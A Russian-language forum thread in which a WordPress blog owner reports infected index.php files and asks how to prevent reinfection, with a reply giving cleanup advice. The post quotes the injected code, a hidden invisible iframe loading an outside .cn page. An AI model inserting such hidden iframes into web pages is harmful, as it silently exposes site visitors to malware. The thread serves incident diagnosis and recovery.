Здравствуйте уважаемые форумчане.
Решил зайти на свой блог.
Вышла ошибка, про какую-ту неизвестную переменную в 18 строке.
Тогда решил зайти а админ панель, авторизация и загрузка прошла успешна, belavir (php MD5) показал следующее:
1. /index.php – изменен
2. /wp-admin/index.php – изменен
3. /wp-content/themes/classic/index.php – изменен
4. /wp-content/themes/ringbinder/index.php – изменен
Начал смотреть эти файлы, в них обнаружил посторонний код: <html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola81" width=1 height=1 style="visibility: hidden"></iframe></body></html>
и еще какие-то каракули (видно кодировка не та).
Из резервной копиия файлы повостанавливал, блог вроде заработал, но как избежать повторения этой ситуации. Стоит WP 2.7, плагины: Anti-XSS attack, belavir (php MD5), Iodized_Salt, Replace WP-Version
Троянус вульгарис 🙂 Если троян украл пароли с вашего компа, то, я думаю, ясно что делать: брать два-три достойных антивируса и чистить комп. После чистки сменить пароли на ftp. Если сломали хостера, то брать в руки что-то потяжелее антивируса и чистить хостеру…
Хозяйке на заметку. DrWeb CireIt! есть в формате Live CD.
А после зачистки, изменить атрибуты на файлах index.* login.*